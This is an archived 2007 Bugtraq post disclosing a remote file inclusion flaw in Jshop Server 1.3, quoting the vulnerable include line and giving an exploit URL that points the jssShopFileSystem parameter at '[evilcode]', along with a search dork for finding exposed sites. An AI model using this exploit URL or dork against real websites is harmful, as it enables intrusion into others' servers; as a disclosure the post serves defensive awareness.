[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070110223636.6175.qmail@securityfocus.com>
Date: 10 Jan 2007 22:36:36 -0000
From: irvian@...siden.com
To: bugtraq@...urityfocus.com
Subject: Jshop Server 1.3
==========================================================================
# scripts : Jshop Server 1.3
# Discovered By : irvian
# script : http://www.jshop.co.uk/
# Thanks To : #hitamputih #nyubicrew #patihack
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork : powered by Jshop
--------------------------------------------------------------------------
file: routines/fieldValidation.php
include($jssShopFileSystem."resources/includes/validations.php");
exploit : http://www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]
Powered by blists - more mailing lists